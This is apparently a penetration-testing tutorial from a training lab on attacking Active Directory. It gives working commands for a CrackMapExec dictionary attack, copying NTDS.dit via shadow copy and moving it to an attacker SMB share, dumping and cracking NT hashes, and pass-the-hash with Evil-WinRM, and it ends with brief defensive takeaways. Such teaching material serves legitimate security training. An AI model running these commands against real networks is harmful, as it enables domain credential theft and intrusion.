Attacking Active Directory & NTDS.dit

Active Directory (AD) is critical in enterprise networks. If an organization uses Windows, AD is likely present, managing users and resources. This guide covers techniques for extracting credentials using dictionary attacks and dumping password hashes from the NTDS.dit file.

---

Understanding Windows Domain Authentication

Once a Windows system joins a domain:

• It stops using the local SAM database for login.

• All authentication requests go to the Domain Controller (DC).

• Local logins are still possible using:

  • hostname\username

  • .\username (at login UI)

Key Authentication Components:

• lsass.exe

• NTLM & Kerberos protocols

• Active Directory Domain Services

---

Dictionary Attacks on AD Accounts

A dictionary attack uses a list of common usernames and passwords to guess valid login credentials. While effective, it’s noisy and easily detected by security systems.

Tools Used:

• CrackMapExec (CME)

Common Username Conventions:

Format	Example for Jane Jill Doe
firstinitiallastname	jdoe
firstnamelastname	janedoe
firstname.lastname	jane.doe
lastname.firstname	doe.jane
nickname	doedoehacksstuff

💡 Tip: Use Google dorks like site:inlanefreight.com filetype:pdf to find usernames in document metadata.

Username List Example:

cat usernames.txt
bwilliamson
benwilliamson
ben.willamson
willamson.ben
...

Generate of usernames.

Use tools like Username Anarchy

./username-anarchy -i /home/ltnbob/names.txt 

---

Launching the Dictionary Attack

CrackMapExec:

crackmapexec smb 10.129.201.57 -u bwilliamson -p /usr/share/wordlists/fasttrack.txt

• If a login is successful, CME will indicate it.

• Failed attempts return STATUS_LOGON_FAILURE.

🛑 Beware of account lockout policies. Not always enabled by default.

---

Event Logging of the Attack

An IT admin can view the event of the attack in the event viewer

Event ID 4776 in Windows Event Viewer (Security Logs) will show:

• Credential validation attempts

• Details of success/failure

---

Capturing NTDS.dit

What is NTDS.dit?

• Located at %SystemRoot%\NTDS\NTDS.dit

• Contains all AD user accounts, password hashes, and schema info

---

Connecting to a DC with Evil-WinRM

evil-winrm -i 10.129.201.57 -u bwilliamson -p 'P@55w0rd!'

Check User Privileges:

net localgroup
net user bwilliamson

• Ensure the user is in Administrators or Domain Admins group

• We are looking to see if the account has local admin rights.

• To make a copy of the NTDS.dit file, we need local admin (Administrators group) or Domain Admin (Domain Admins group) (or equivalent) rights. We also will want to check what domain privileges we have.

---

Creating a Shadow Copy of NTDS.dit

vssadmin CREATE SHADOW /For=C:

Copy the File:

We can then copy the NTDS.dit file from the volume shadow copy of C: onto another location on the drive to prepare to move NTDS.dit to our attack host.

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit C:\NTDS\NTDS.dit

Transfer to attacker’s machine using an SMB share.

1. create an SMB share on our attack host

2. Move or Copy the file to the attacker machine

move C:\NTDS\NTDS.dit \\10.10.15.30\CompData

---

Quick Method: Dumping NTDS.dit with CrackMapExec

crackmapexec smb 10.129.201.57 -u bwilliamson -p 'P@55w0rd!' --ntds

• Dumps NTDS directly in terminal

• Saves all retrieved hashes for further use

---

Cracking Hashes

Use Hashcat to crack NT hashes:

sudo hashcat -m 1000 64f12cddaa88057e06a81b54e73b949b /usr/share/wordlists/rockyou.txt

Output: 64f12cddaa88057e06a81b54e73b949b:Password1

---

Pass-the-Hash (PtH)

Even if hashes can't be cracked, use them for authentication by passing them around the network:

evil-winrm -i 10.129.201.57 -u Administrator -H "64f12cddaa88057e06a81b54e73b949b"

Useful for lateral movement within the network.

---

Defensive Takeaways

• Monitor for Event ID 4776

• Enforce account lockout policies

• Harden access to NTDS.dit (limit admin privileges)

• Regularly audit & monitor for VSS misuse